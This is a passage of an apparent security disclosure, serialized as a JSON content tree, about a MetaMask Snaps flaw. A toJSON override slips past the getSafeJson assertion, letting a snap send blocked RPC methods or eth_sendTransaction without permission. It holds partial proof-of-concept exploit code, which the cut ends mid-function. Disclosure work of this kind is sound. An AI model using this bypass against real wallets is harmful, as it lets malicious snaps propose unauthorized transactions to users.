assertStruct",{"type":26,"tag":137,"props":41158,"children":41159},{"style":5601},[41160],{"type":32,"value":165},{"type":26,"tag":137,"props":41162,"children":41163},{"style":5584},[41164],{"type":32,"value":40824},{"type":26,"tag":137,"props":41166,"children":41167},{"style":5601},[41168],{"type":32,"value":1108},{"type":26,"tag":137,"props":41170,"children":41171},{"style":5584},[41172],{"type":32,"value":41173},"JsonStruct",{"type":26,"tag":137,"props":41175,"children":41176},{"style":5601},[41177],{"type":32,"value":1108},{"type":26,"tag":137,"props":41179,"children":41180},{"style":6837},[41181],{"type":32,"value":41182},"'Provided value is not JSON-RPC compatible'",{"type":26,"tag":137,"props":41184,"children":41185},{"style":5601},[41186],{"type":32,"value":6430},{"type":26,"tag":137,"props":41188,"children":41189},{"class":5559,"line":6270},[41190],{"type":26,"tag":137,"props":41191,"children":41192},{"style":5601},[41193],{"type":32,"value":6507},{"type":26,"tag":35,"props":41195,"children":41196},{},[41197,41199,41204,41206,41212,41213,41219],{"type":32,"value":41198},"This function is called by the ",{"type":26,"tag":130,"props":41200,"children":41202},{"className":41201},[],[41203],{"type":32,"value":40774},{"type":32,"value":41205}," RPC provider, so it can only send methods starting with ",{"type":26,"tag":130,"props":41207,"children":41209},{"className":41208},[],[41210],{"type":32,"value":41211},"wallet_",{"type":32,"value":15725},{"type":26,"tag":130,"props":41214,"children":41216},{"className":41215},[],[41217],{"type":32,"value":41218},"snap_",{"type":32,"value":41220},". In addition, there are some blocked RPC methods that immediately throw an error when encountered.",{"type":26,"tag":35,"props":41222,"children":41223},{},[41224,41226,41231,41233,41238,41240,41246],{"type":32,"value":41225},"On the other hand, the ",{"type":26,"tag":130,"props":41227,"children":41229},{"className":41228},[],[41230],{"type":32,"value":34012},{"type":32,"value":41232}," provider only blocks methods starting with ",{"type":26,"tag":130,"props":41234,"children":41236},{"className":41235},[],[41237],{"type":32,"value":41218},{"type":32,"value":41239}," and the blocked methods. However, it requires the ",{"type":26,"tag":130,"props":41241,"children":41243},{"className":41242},[],[41244],{"type":32,"value":41245},"endowment:ethereum-provider",{"type":32,"value":41247}," permission in the snap manifest.",{"type":26,"tag":21485,"props":41249,"children":41251},{"id":41250},"execution-flow",[41252],{"type":32,"value":41253},"Execution flow",{"type":26,"tag":35,"props":41255,"children":41256},{},[41257,41259,41264,41265,41270,41272,41277,41278,41284],{"type":32,"value":41258},"Both providers (",{"type":26,"tag":130,"props":41260,"children":41262},{"className":41261},[],[41263],{"type":32,"value":40774},{"type":32,"value":3339},{"type":26,"tag":130,"props":41266,"children":41268},{"className":41267},[],[41269],{"type":32,"value":34012},{"type":32,"value":41271},") are built outside the SES container with a ",{"type":26,"tag":130,"props":41273,"children":41275},{"className":41274},[],[41276],{"type":32,"value":34088},{"type":32,"value":1011},{"type":26,"tag":41,"props":41279,"children":41282},{"href":41280,"rel":41281},"https://github.com/MetaMask/snaps/blob/main/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L437",[45],[41283],{"type":32,"value":33972},{"type":32,"value":7072},{"type":26,"tag":5512,"props":41286,"children":41288},{"className":38526,"code":41287,"language":38528,"meta":7,"style":7},"  const request = async (args: RequestArguments) => {\n      assertSnapOutboundRequest(args); // or assertEthereumOutboundRequest(args);\n      const sanitizedArgs = getSafeJson(args);\n      this.notify({ method: 'OutboundRequest' });\n      try {\n        return await withTeardown(\n          originalRequest(sanitizedArgs as unknown as RequestArguments),\n          this as any,\n        );\n      } finally {\n        this.notify({ method: 'OutboundResponse' });\n      }\n    };\n",[41289],{"type":26,"tag":130,"props":41290,"children":41291},{"__ignoreMap":7},[41292,41339,41364,41397,41432,41444,41464,41502,41522,41529,41546,41579,41586],{"type":26,"tag":137,"props":41293,"children":41294},{"class":5559,"line":5560},[41295,41299,41303,41307,41311,41315,41319,41323,41327,41331,41335],{"type":26,"tag":137,"props":41296,"children":41297},{"style":5573},[41298],{"type":32,"value":38784},{"type":26,"tag":137,"props":41300,"children":41301},{"style":5682},[41302],{"type":32,"value":33977},{"type":26,"tag":137,"props":41304,"children":41305},{"style":5590},[41306],{"type":32,"value":5593},{"type":26,"tag":137,"props":41308,"children":41309},{"style":5573},[41310],{"type":32,"value":38961},{"type":26,"tag":137,"props":41312,"children":41313},{"style":5601},[41314],{"type":32,"value":4625},{"type":26,"tag":137,"props":41316,"children":41317},{"style":5584},[41318],{"type":32,"value":40824},{"type":26,"tag":137,"props":41320,"children":41321},{"style":5590},[41322],{"type":32,"value":7072},{"type":26,"tag":137,"props":41324,"children":41325},{"style":6009},[41326],{"type":32,"value":40833},{"type":26,"tag":137,"props":41328,"children":41329},{"style":5601},[41330],{"type":32,"value":5671},{"type":26,"tag":137,"props":41332,"children":41333},{"style":5573},[41334],{"type":32,"value":17413},{"type":26,"tag":137,"props":41336,"children":41337},{"style":5601},[41338],{"type":32,"value":5875},{"type":26,"tag":137,"props":41340,"children":41341},{"class":5559,"line":5412},[41342,41347,41351,41355,41359],{"type":26,"tag":137,"props":41343,"children":41344},{"style":5682},[41345],{"type":32,"value":41346},"      assertSnapOutboundRequest",{"type":26,"tag":137,"props":41348,"children":41349},{"style":5601},[41350],{"type":32,"value":165},{"type":26,"tag":137,"props":41352,"children":41353},{"style":5584},[41354],{"type":32,"value":40824},{"type":26,"tag":137,"props":41356,"children":41357},{"style":5601},[41358],{"type":32,"value":30946},{"type":26,"tag":137,"props":41360,"children":41361},{"style":5564},[41362],{"type":32,"value":41363},"// or assertEthereumOutboundRequest(args);\n",{"type":26,"tag":137,"props":41365,"children":41366},{"class":5559,"line":5417},[41367,41371,41376,41380,41385,41389,41393],{"type":26,"tag":137,"props":41368,"children":41369},{"style":5573},[41370],{"type":32,"value":34142},{"type":26,"tag":137,"props":41372,"children":41373},{"style":5584},[41374],{"type":32,"value":41375}," sanitizedArgs",{"type":26,"tag":137,"props":41377,"children":41378},{"style":5590},[41379],{"type":32,"value":5593},{"type":26,"tag":137,"props":41381,"children":41382},{"style":5682},[41383],{"type":32,"value":41384}," getSafeJson",{"type":26,"tag":137,"props":41386,"children":41387},{"style":5601},[41388],{"type":32,"value":165},{"type":26,"tag":137,"props":41390,"children":41391},{"style":5584},[41392],{"type":32,"value":40824},{"type":26,"tag":137,"props":41394,"children":41395},{"style":5601},[41396],{"type":32,"value":6430},{"type":26,"tag":137,"props":41398,"children":41399},{"class":5559,"line":5642},[41400,41405,41409,41414,41418,41422,41427],{"type":26,"tag":137,"props":41401,"children":41402},{"style":5573},[41403],{"type":32,"value":41404},"      this",{"type":26,"tag":137,"props":41406,"children":41407},{"style":5601},[41408],{"type":32,"value":470},{"type":26,"tag":137,"props":41410,"children":41411},{"style":5682},[41412],{"type":32,"value":41413},"notify",{"type":26,"tag":137,"props":41415,"children":41416},{"style":5601},[41417],{"type":32,"value":34093},{"type":26,"tag":137,"props":41419,"children":41420},{"style":5584},[41421],{"type":32,"value":34098},{"type":26,"tag":137,"props":41423,"children":41424},{"style":6837},[41425],{"type":32,"value":41426}," 'OutboundRequest'",{"type":26,"tag":137,"props":41428,"children":41429},{"style":5601},[41430],{"type":32,"value":41431}," });\n",{"type":26,"tag":137,"props":41433,"children":41434},{"class":5559,"line":5745},[41435,41440],{"type":26,"tag":137,"props":41436,"children":41437},{"style":5610},[41438],{"type":32,"value":41439},"      try",{"type":26,"tag":137,"props":41441,"children":41442},{"style":5601},[41443],{"type":32,"value":5875},{"type":26,"tag":137,"props":41445,"children":41446},{"class":5559,"line":5850},[41447,41451,41455,41460],{"type":26,"tag":137,"props":41448,"children":41449},{"style":5610},[41450],{"type":32,"value":18336},{"type":26,"tag":137,"props":41452,"children":41453},{"style":5610},[41454],{"type":32,"value":38807},{"type":26,"tag":137,"props":41456,"children":41457},{"style":5682},[41458],{"type":32,"value":41459}," withTeardown",{"type":26,"tag":137,"props":41461,"children":41462},{"style":5601},[41463],{"type":32,"value":6054},{"type":26,"tag":137,"props":41465,"children":41466},{"class":5559,"line":5878},[41467,41472,41476,41481,41485,41490,41494,41498],{"type":26,"tag":137,"props":41468,"children":41469},{"style":5682},[41470],{"type":32,"value":41471},"          originalRequest",{"type":26,"tag":137,"props":41473,"children":41474},{"style":5601},[41475],{"type":32,"value":165},{"type":26,"tag":137,"props":41477,"children":41478},{"style":5584},[41479],{"type":32,"value":41480},"sanitizedArgs",{"type":26,"tag":137,"props":41482,"children":41483},{"style":5610},[41484],{"type":32,"value":11414},{"type":26,"tag":137,"props":41486,"children":41487},{"style":6009},[41488],{"type":32,"value":41489}," unknown",{"type":26,"tag":137,"props":41491,"children":41492},{"style":5610},[41493],{"type":32,"value":11414},{"type":26,"tag":137,"props":41495,"children":41496},{"style":6009},[41497],{"type":32,"value":40833},{"type":26,"tag":137,"props":41499,"children":41500},{"style":5601},[41501],{"type":32,"value":9320},{"type":26,"tag":137,"props":41503,"children":41504},{"class":5559,"line":5891},[41505,41510,41514,41518],{"type":26,"tag":137,"props":41506,"children":41507},{"style":5573},[41508],{"type":32,"value":41509},"          this",{"type":26,"tag":137,"props":41511,"children":41512},{"style":5610},[41513],{"type":32,"value":11414},{"type":26,"tag":137,"props":41515,"children":41516},{"style":6009},[41517],{"type":32,"value":12948},{"type":26,"tag":137,"props":41519,"children":41520},{"style":5601},[41521],{"type":32,"value":6099},{"type":26,"tag":137,"props":41523,"children":41524},{"class":5559,"line":5909},[41525],{"type":26,"tag":137,"props":41526,"children":41527},{"style":5601},[41528],{"type":32,"value":10328},{"type":26,"tag":137,"props":41530,"children":41531},{"class":5559,"line":5930},[41532,41537,41542],{"type":26,"tag":137,"props":41533,"children":41534},{"style":5601},[41535],{"type":32,"value":41536},"      } ",{"type":26,"tag":137,"props":41538,"children":41539},{"style":5610},[41540],{"type":32,"value":41541},"finally",{"type":26,"tag":137,"props":41543,"children":41544},{"style":5601},[41545],{"type":32,"value":5875},{"type":26,"tag":137,"props":41547,"children":41548},{"class":5559,"line":5939},[41549,41554,41558,41562,41566,41570,41575],{"type":26,"tag":137,"props":41550,"children":41551},{"style":5573},[41552],{"type":32,"value":41553},"        this",{"type":26,"tag":137,"props":41555,"children":41556},{"style":5601},[41557],{"type":32,"value":470},{"type":26,"tag":137,"props":41559,"children":41560},{"style":5682},[41561],{"type":32,"value":41413},{"type":26,"tag":137,"props":41563,"children":41564},{"style":5601},[41565],{"type":32,"value":34093},{"type":26,"tag":137,"props":41567,"children":41568},{"style":5584},[41569],{"type":32,"value":34098},{"type":26,"tag":137,"props":41571,"children":41572},{"style":6837},[41573],{"type":32,"value":41574}," 'OutboundResponse'",{"type":26,"tag":137,"props":41576,"children":41577},{"style":5601},[41578],{"type":32,"value":41431},{"type":26,"tag":137,"props":41580,"children":41581},{"class":5559,"line":6191},[41582],{"type":26,"tag":137,"props":41583,"children":41584},{"style":5601},[41585],{"type":32,"value":15255},{"type":26,"tag":137,"props":41587,"children":41588},{"class":5559,"line":6208},[41589],{"type":26,"tag":137,"props":41590,"children":41591},{"style":5601},[41592],{"type":32,"value":41593},"    };\n",{"type":26,"tag":35,"props":41595,"children":41596},{},[41597,41599,41604,41606,41611],{"type":32,"value":41598},"In particular, this function is from the ",{"type":26,"tag":130,"props":41600,"children":41602},{"className":41601},[],[41603],{"type":32,"value":40774},{"type":32,"value":41605}," provider, but the only thing that changes between this and ",{"type":26,"tag":130,"props":41607,"children":41609},{"className":41608},[],[41610],{"type":32,"value":34012},{"type":32,"value":41612}," is the assert function in the first line.",{"type":26,"tag":35,"props":41614,"children":41615},{},[41616],{"type":32,"value":41617},"As we can see in the code, the execution flow follows this pattern:",{"type":26,"tag":4820,"props":41619,"children":41620},{},[41621,41633,41638],{"type":26,"tag":3430,"props":41622,"children":41623},{},[41624,41626,41631],{"type":32,"value":41625},"Assert if ",{"type":26,"tag":130,"props":41627,"children":41629},{"className":41628},[],[41630],{"type":32,"value":40824},{"type":32,"value":41632}," are valid",{"type":26,"tag":3430,"props":41634,"children":41635},{},[41636],{"type":32,"value":41637},"getSafeJson to get sanitizedArgs",{"type":26,"tag":3430,"props":41639,"children":41640},{},[41641],{"type":32,"value":41642},"originalRequest(sanitizedArgs)",{"type":26,"tag":35,"props":41644,"children":41645},{},[41646,41648,41654],{"type":32,"value":41647},"Obs: ",{"type":26,"tag":130,"props":41649,"children":41651},{"className":41650},[],[41652],{"type":32,"value":41653},"originalRequest",{"type":32,"value":41655}," makes the RPC call to metamask service worker",{"type":26,"tag":118,"props":41657,"children":41659},{"id":41658},"safe-json-exploit",[41660],{"type":32,"value":41661},"Safe JSON Exploit",{"type":26,"tag":35,"props":41663,"children":41664},{},[41665,41667,41673,41675,41680,41682,41688],{"type":32,"value":41666},"As we dug further into the",{"type":26,"tag":130,"props":41668,"children":41670},{"className":41669},[],[41671],{"type":32,"value":41672},"getSafeJson",{"type":32,"value":41674}," function (defined in ",{"type":26,"tag":130,"props":41676,"children":41678},{"className":41677},[],[41679],{"type":32,"value":39892},{"type":32,"value":41681}," package) we discovered the following ",{"type":26,"tag":41,"props":41683,"children":41686},{"href":41684,"rel":41685},"https://github.com/MetaMask/utils/blob/7f0116d4d853d85319d200c503a2f9abc390f1d3/src/json.ts#L72",[45],[41687],{"type":32,"value":130},{"type":32,"value":7072},{"type":26,"tag":5512,"props":41690,"children":41692},{"className":38209,"code":41691,"language":38211,"meta":7,"style":7},"export const JsonStruct = coerce(UnsafeJsonStruct, any(), (value) => {\n  assertStruct(value, UnsafeJsonStruct);\n  return JSON.parse(\n    JSON.stringify(value, (propKey, propValue) => {\n      // Strip __proto__ and constructor properties to prevent prototype pollution.\n      if (propKey === '__proto__' || propKey === 'constructor') {\n        return undefined;\n      }\n      return propValue;\n    }),\n  );\n});\n",[41693],{"type":26,"tag":130,"props":41694,"children":41695},{"__ignoreMap":7},[41696,41761,41788,41813,41868,41876,41923,41939,41946,41963,41970,41977],{"type":26,"tag":137,"props":41697,"children":41698},{"class":5559,"line":5560},[41699,41703,41708,41713,41717,41722,41726,41731,41735,41739,41744,41749,41753,41757],{"type":26,"tag":137,"props":41700,"children":41701},{"style":5610},[41702],{"type":32,"value":40805},{"type":26,"tag":137,"props":41704,"children":41705},{"style":5573},[41706],{"type":32,"value":41707}," const",{"type":26,"tag":137,"props":41709,"children":41710},{"style":5584},[41711],{"type":32,"value":41712}," JsonStruct",{"type":26,"tag":137,"props":41714,"children":41715},{"style":5590},[41716],{"type":32,"value":5593},{"type":26,"tag":137,"props":41718,"children":41719},{"style":5682},[41720],{"type":32,"value":41721}," coerce",{"type":26,"tag":137,"props":41723,"children":41724},{"style":5601},[41725],{"type":32,"value":165},{"type":26,"tag":137,"props":41727,"children":41728},{"style":5584},[41729],{"type":32,"value":41730},"UnsafeJsonStruct",{"type":26,"tag":137,"props":41732,"children":41733},{"style":5601},[41734],{"type":32,"value":1108},{"type":26,"tag":137,"props":41736,"children":41737},{"style":5682},[41738],{"type":32,"value":19306},{"type":26,"tag":137,"props":41740,"children":41741},{"style":5601},[41742],{"type":32,"value":41743},"(), (",{"type":26,"tag":137,"props":41745,"children":41746},{"style":5584},[41747],{"type":32,"value":41748},"value",{"type":26,"tag":137,"props":41750,"children":41751},{"style":5601},[41752],{"type":32,"value":5671},{"type":26,"tag":137,"props":41754,"children":41755},{"style":5573},[41756],{"type":32,"value":17413},{"type":26,"tag":137,"props":41758,"children":41759},{"style":5601},[41760],{"type":32,"value":5875},{"type":26,"tag":137,"props":41762,"children":41763},{"class":5559,"line":5412},[41764,41768,41772,41776,41780,41784],{"type":26,"tag":137,"props":41765,"children":41766},{"style":5682},[41767],{"type":32,"value":41156},{"type":26,"tag":137,"props":41769,"children":41770},{"style":5601},[41771],{"type":32,"value":165},{"type":26,"tag":137,"props":41773,"children":41774},{"style":5584},[41775],{"type":32,"value":41748},{"type":26,"tag":137,"props":41777,"children":41778},{"style":5601},[41779],{"type":32,"value":1108},{"type":26,"tag":137,"props":41781,"children":41782},{"style":5584},[41783],{"type":32,"value":41730},{"type":26,"tag":137,"props":41785,"children":41786},{"style":5601},[41787],{"type":32,"value":6430},{"type":26,"tag":137,"props":41789,"children":41790},{"class":5559,"line":5417},[41791,41796,41800,41804,41809],{"type":26,"tag":137,"props":41792,"children":41793},{"style":5610},[41794],{"type":32,"value":41795},"  return",{"type":26,"tag":137,"props":41797,"children":41798},{"style":5584},[41799],{"type":32,"value":40124},{"type":26,"tag":137,"props":41801,"children":41802},{"style":5601},[41803],{"type":32,"value":470},{"type":26,"tag":137,"props":41805,"children":41806},{"style":5682},[41807],{"type":32,"value":41808},"parse",{"type":26,"tag":137,"props":41810,"children":41811},{"style":5601},[41812],{"type":32,"value":6054},{"type":26,"tag":137,"props":41814,"children":41815},{"class":5559,"line":5642},[41816,41821,41825,41830,41834,41838,41842,41847,41851,41856,41860,41864],{"type":26,"tag":137,"props":41817,"children":41818},{"style":5584},[41819],{"type":32,"value":41820},"    JSON",{"type":26,"tag":137,"props":41822,"children":41823},{"style":5601},[41824],{"type":32,"value":470},{"type":26,"tag":137,"props":41826,"children":41827},{"style":5682},[41828],{"type":32,"value":41829},"stringify",{"type":26,"tag":137,"props":41831,"children":41832},{"style":5601},[41833],{"type":32,"value":165},{"type":26,"tag":137,"props":41835,"children":41836},{"style":5584},[41837],{"type":32,"value":41748},{"type":26,"tag":137,"props":41839,"children":41840},{"style":5601},[41841],{"type":32,"value":11405},{"type":26,"tag":137,"props":41843,"children":41844},{"style":5584},[41845],{"type":32,"value":41846},"propKey",{"type":26,"tag":137,"props":41848,"children":41849},{"style":5601},[41850],{"type":32,"value":1108},{"type":26,"tag":137,"props":41852,"children":41853},{"style":5584},[41854],{"type":32,"value":41855},"propValue",{"type":26,"tag":137,"props":41857,"children":41858},{"style":5601},[41859],{"type":32,"value":5671},{"type":26,"tag":137,"props":41861,"children":41862},{"style":5573},[41863],{"type":32,"value":17413},{"type":26,"tag":137,"props":41865,"children":41866},{"style":5601},[41867],{"type":32,"value":5875},{"type":26,"tag":137,"props":41869,"children":41870},{"class":5559,"line":5745},[41871],{"type":26,"tag":137,"props":41872,"children":41873},{"style":5564},[41874],{"type":32,"value":41875},"      // Strip __proto__ and constructor properties to prevent prototype pollution.\n",{"type":26,"tag":137,"props":41877,"children":41878},{"class":5559,"line":5850},[41879,41884,41888,41892,41896,41901,41905,41910,41914,41919],{"type":26,"tag":137,"props":41880,"children":41881},{"style":5610},[41882],{"type":32,"value":41883},"      if",{"type":26,"tag":137,"props":41885,"children":41886},{"style":5601},[41887],{"type":32,"value":4625},{"type":26,"tag":137,"props":41889,"children":41890},{"style":5584},[41891],{"type":32,"value":41846},{"type":26,"tag":137,"props":41893,"children":41894},{"style":5590},[41895],{"type":32,"value":34017},{"type":26,"tag":137,"props":41897,"children":41898},{"style":6837},[41899],{"type":32,"value":41900}," '__proto__'",{"type":26,"tag":137,"props":41902,"children":41903},{"style":5590},[41904],{"type":32,"value":26288},{"type":26,"tag":137,"props":41906,"children":41907},{"style":5584},[41908],{"type":32,"value":41909}," propKey",{"type":26,"tag":137,"props":41911,"children":41912},{"style":5590},[41913],{"type":32,"value":34017},{"type":26,"tag":137,"props":41915,"children":41916},{"style":6837},[41917],{"type":32,"value":41918}," 'constructor'",{"type":26,"tag":137,"props":41920,"children":41921},{"style":5601},[41922],{"type":32,"value":17395},{"type":26,"tag":137,"props":41924,"children":41925},{"class":5559,"line":5878},[41926,41930,41935],{"type":26,"tag":137,"props":41927,"children":41928},{"style":5610},[41929],{"type":32,"value":18336},{"type":26,"tag":137,"props":41931,"children":41932},{"style":5573},[41933],{"type":32,"value":41934}," undefined",{"type":26,"tag":137,"props":41936,"children":41937},{"style":5601},[41938],{"type":32,"value":5604},{"type":26,"tag":137,"props":41940,"children":41941},{"class":5559,"line":5891},[41942],{"type":26,"tag":137,"props":41943,"children":41944},{"style":5601},[41945],{"type":32,"value":15255},{"type":26,"tag":137,"props":41947,"children":41948},{"class":5559,"line":5909},[41949,41954,41959],{"type":26,"tag":137,"props":41950,"children":41951},{"style":5610},[41952],{"type":32,"value":41953},"      return",{"type":26,"tag":137,"props":41955,"children":41956},{"style":5584},[41957],{"type":32,"value":41958}," propValue",{"type":26,"tag":137,"props":41960,"children":41961},{"style":5601},[41962],{"type":32,"value":5604},{"type":26,"tag":137,"props":41964,"children":41965},{"class":5559,"line":5930},[41966],{"type":26,"tag":137,"props":41967,"children":41968},{"style":5601},[41969],{"type":32,"value":41141},{"type":26,"tag":137,"props":41971,"children":41972},{"class":5559,"line":5939},[41973],{"type":26,"tag":137,"props":41974,"children":41975},{"style":5601},[41976],{"type":32,"value":41008},{"type":26,"tag":137,"props":41978,"children":41979},{"class":5559,"line":6191},[41980],{"type":26,"tag":137,"props":41981,"children":41982},{"style":5601},[41983],{"type":32,"value":37934},{"type":26,"tag":35,"props":41985,"children":41986},{},[41987,41989,41995,41997,42002,42004,42010,42012,42018],{"type":32,"value":41988},"The function performs a ",{"type":26,"tag":130,"props":41990,"children":41992},{"className":41991},[],[41993],{"type":32,"value":41994},"JSON.parse(JSON.stringify(value))",{"type":32,"value":41996}," in the argument sent to ",{"type":26,"tag":130,"props":41998,"children":42000},{"className":41999},[],[42001],{"type":32,"value":41672},{"type":32,"value":42003},". This specific function is how we found a way to exploit the assertion limitations. The bypass is made by setting a ",{"type":26,"tag":130,"props":42005,"children":42007},{"className":42006},[],[42008],{"type":32,"value":42009},"toJSON",{"type":32,"value":42011}," function in a legit ",{"type":26,"tag":130,"props":42013,"children":42015},{"className":42014},[],[42016],{"type":32,"value":42017},"snap.request",{"type":32,"value":42019}," argument:",{"type":26,"tag":4820,"props":42021,"children":42022},{},[42023,42028,42033],{"type":26,"tag":3430,"props":42024,"children":42025},{},[42026],{"type":32,"value":42027},"assertSnapOutboundRequest(args) -> pass the assertion",{"type":26,"tag":3430,"props":42029,"children":42030},{},[42031],{"type":32,"value":42032},"sanitizedArgs = getSafeJson(args) -> toJSON returns a malicious object",{"type":26,"tag":3430,"props":42034,"children":42035},{},[42036],{"type":32,"value":42037},"originalRequest(sanitizedArgs) -> forwards the malicious object",{"type":26,"tag":35,"props":42039,"children":42040},{},[42041],{"type":32,"value":42042},"The assertion bypass can be useful on two occasions:",{"type":26,"tag":4820,"props":42044,"children":42045},{},[42046,42051],{"type":26,"tag":3430,"props":42047,"children":42048},{},[42049],{"type":32,"value":42050},"forward blocked RPC methods",{"type":26,"tag":3430,"props":42052,"children":42053},{},[42054,42056,42061,42063,42069,42071,42076],{"type":32,"value":42055},"Making requests in ",{"type":26,"tag":130,"props":42057,"children":42059},{"className":42058},[],[42060],{"type":32,"value":42017},{"type":32,"value":42062}," that were only supposed to be done within ",{"type":26,"tag":130,"props":42064,"children":42066},{"className":42065},[],[42067],{"type":32,"value":42068},"ethereum.request",{"type":32,"value":42070}," (with ",{"type":26,"tag":130,"props":42072,"children":42074},{"className":42073},[],[42075],{"type":32,"value":41245},{"type":32,"value":42077}," enabled).",{"type":26,"tag":35,"props":42079,"children":42080},{},[42081],{"type":32,"value":42082},"This particular vulnerability allows the snap to perform ethereum requests without permissions.",{"type":26,"tag":118,"props":42084,"children":42085},{"id":8246},[42086],{"type":32,"value":8249},{"type":26,"tag":35,"props":42088,"children":42089},{},[42090],{"type":32,"value":42091},"The bypass we described may be used to mislead the allowed permissions of the snap. This can cause the snap installation confirmation popup not to display the actual permissions of the snap. This exploit allows the snap to unexpectedly propose malicious transactions to the user, which shouldn't be possible, even with permissions according to the documentation.",{"type":26,"tag":35,"props":42093,"children":42094},{},[42095],{"type":26,"tag":2210,"props":42096,"children":42098},{"alt":7,"src":42097},"/posts/metamask-snaps/note.png",[],{"type":26,"tag":118,"props":42100,"children":42102},{"id":42101},"proof-of-concept",[42103],{"type":32,"value":37425},{"type":26,"tag":35,"props":42105,"children":42106},{},[42107,42109,42114,42116,42121,42123,42129],{"type":32,"value":42108},"To demonstrate the issue, we created a snap without the ",{"type":26,"tag":130,"props":42110,"children":42112},{"className":42111},[],[42113],{"type":32,"value":41245},{"type":32,"value":42115}," permission, and used the ",{"type":26,"tag":130,"props":42117,"children":42119},{"className":42118},[],[42120],{"type":32,"value":40774},{"type":32,"value":42122}," interface to call ",{"type":26,"tag":130,"props":42124,"children":42126},{"className":42125},[],[42127],{"type":32,"value":42128},"eth_sendTransaction",{"type":32,"value":42130},". According to the documentation, this shouldn't be possible:",{"type":26,"tag":5512,"props":42132,"children":42134},{"className":38209,"code":42133,"language":38211,"meta":7,"style":7},"import { OnRpcRequestHandler } from '@metamask/snaps-types';\n\n\nfunction jsonExploit(){\n  let x = [] as any\n\n  x.method = \"snap_dialog\"\n\n  x.toJSON = () => {\n    return {\n      method: \"eth_requestAccounts\",\n      params: []\n    }\n  }\n\n  return snap.request(x)\n\n}\n\nfunction transactionExploit(){\n  let x = [] as any\n\n  x.method = \"snap_dialog\"\n\n  x.toJSON = () => {\n    return {\n      method: \"eth_sendTransaction\",\n      params: [{\n        from: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\", // change this to your address\n        to: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\",\n        value: \"0x1\",\n      }]\n    }\n  }\n\n  return snap.request(x);\n}\n\nexport const onRpcRequest: OnRpcRequestHandler = ({ origin, request }) => {\n\n  switch (request.method) {\n    case 'json':\n      return jsonExploit();\n    case 'transaction':\n      return transactionExploit();\n    default:\n      throw new Error('Method not found.');\n  }\n};\n",[42135],{"type":26,"tag":130,"props":42136,"children":42137},{"__ignoreMap":7},[42138,42171,42178,42185,42202,42231,42238,42263,42270,42302,42313,42330,42343,42350,42357,42364,42396,42403,42410,42417,42433,42460,42467,42490,42497,42528,42539,42555,42567,42588,42603,42620,42628,42635,42642,42649,42680,42687,42694,42754,42761,42789,42806,42821,42837,42852,42864,42894,42901],{"type":26,"tag":137,"props":42139,"children":42140},{"class":5559,"line":5560},[42141,42145,42149,42154,42158,42162,42167],{"type":26,"tag":137,"props":42142,"children":42143},{"style":5610},[42144],{"type":32,"value":22076},{"type":26,"tag":137,"props":42146,"children":42147},{"style":5601},[42148],{"type":32,"value":12175},{"type":26,"tag":137,"props":42150,"children":42151},{"style":5584},[42152],{"type":32,"value":42153},"OnRpcRequestHandler",{"type":26,"tag":137,"props":42155,"children":42156},{"style":5601},[42157],{"type":32,"value":38798},{"type":26,"tag":137,"props":42159,"children":42160},{"style":5610},[42161],{"type":32,"value":22066},{"type":26,"tag":137,"props":42163,"children":42164},{"style":6837},[42165],{"type":32,"value":42166}," '@metamask/snaps-types'",{"type":26,"tag":137,"props":42168,"children":42169},{"style":5601},[42170],{"type":32,"value":5604},{"type":26,"tag":137,"props":42172,"children":42173},{"class":5559,"line":5412},[42174],{"type":26,"tag":137,"props":42175,"children":42176},{"emptyLinePlaceholder":18},[42177],{"type":32,"value":6276},{"type":26,"tag":137,"props":42179,"children":42180},{"class":5559,"line":5417},[42181],{"type":26,"tag":137,"props":42182,"children":42183},{"emptyLinePlaceholder":18},[42184],{"type":32,"value":6276},{"type":26,"tag":137,"props":42186,"children":42187},{"class":5559,"line":5642},[42188,42192,42197],{"type":26,"tag":137,"props":42189,"children":42190},{"style":5573},[42191],{"type":32,"value":33972},{"type":26,"tag":137,"props":42193,"children":42194},{"style":5682},[42195],{"type":32,"value":42196}," jsonExploit",{"type":26,"tag":137,"props":42198,"children":42199},{"style":5601},[42200],{"type":32,"value":42201},"(){\n",{"type":26,"tag":137,"props":42203,"children":42204},{"class":5559,"line":5745},[42205,42209,42213,42217,42222,42226],{"type":26,"tag":137,"props":42206,"children":42207},{"style":5573},[42208],{"type":32,"value":10440},{"type":26,"tag":137,"props":42210,"children":42211},{"style":5584},[42212],{"type":32,"value":21658},{"type":26,"tag":137,"props":42214,"children":42215},{"style":5590},[42216],{"type":32,"value":5593},{"type":26,"tag":137,"props":42218,"children":42219},{"style":5601},[42220],{"type":32,"value":42221}," [] ",{"type":26,"tag":137,"props":42223,"children":42224},{"style":5610},[42225],{"type":32,"value":11428},{"type":26,"tag":137,"props":42227,"children":42228},{"style":6009},[42229],{"type":32,"value":42230}," any\n",{"type":26,"tag":137,"props":42232,"children":42233},{"class":5559,"line":5850},[42234],{"type":26,"tag":137,"props":42235,"children":42236},{"emptyLinePlaceholder":18},[42237],{"type":32,"value":6276},{"type":26,"tag":137,"props":42239,"children":42240},{"class":5559,"line":5878},[42241,42246,42250,42254,42258],{"type":26,"tag":137,"props":42242,"children":42243},{"style":5584},[42244],{"type":32,"value":42245},"  x",{"type":26,"tag":137,"props":42247,"children":42248},{"style":5601},[42249],{"type":32,"value":470},{"type":26,"tag":137,"props":42251,"children":42252},{"style":5584},[42253],{"type":32,"value":40909},{"type":26,"tag":137,"props":42255,"children":42256},{"style":5590},[42257],{"type":32,"value":5593},{"type":26,"tag":137,"props":42259,"children":42260},{"style":6837},[42261],{"type":32,"value":42262}," \"snap_dialog\"\n",{"type":26,"tag":137,"props":42264,"children":42265},{"class":5559,"line":5891},[42266],{"type":26,"tag":137,"props":42267,"children":42268},{"emptyLinePlaceholder":18},[42269],{"type":32,"value":6276},{"type":26,"tag":137,"props":42271,"children":42272},{"class":5559,"line":5909},[42273,42277,42281,42285,42289,42294,42298],{"type":26,"tag":137,"props":42274,"children":42275},{"style":5584},[42276],{"type":32,"value":42245},{"type":26,"tag":137,"props":42278,"children":42279},{"style":5601},[42280],{"type":32,"value":470},{"type":26,"tag":137,"props":42282,"children":42283},{"style":5682},[42284],{"type":32,"value":42009},{"type":26,"tag":137,"props":42286,"children":42287},{"style":5590},[42288],{"type":32,"value":5593},{"type":26,"tag":137,"props":42290,"children":42291},{"style":5601},[42292],{"type":32,"value":42293}," () 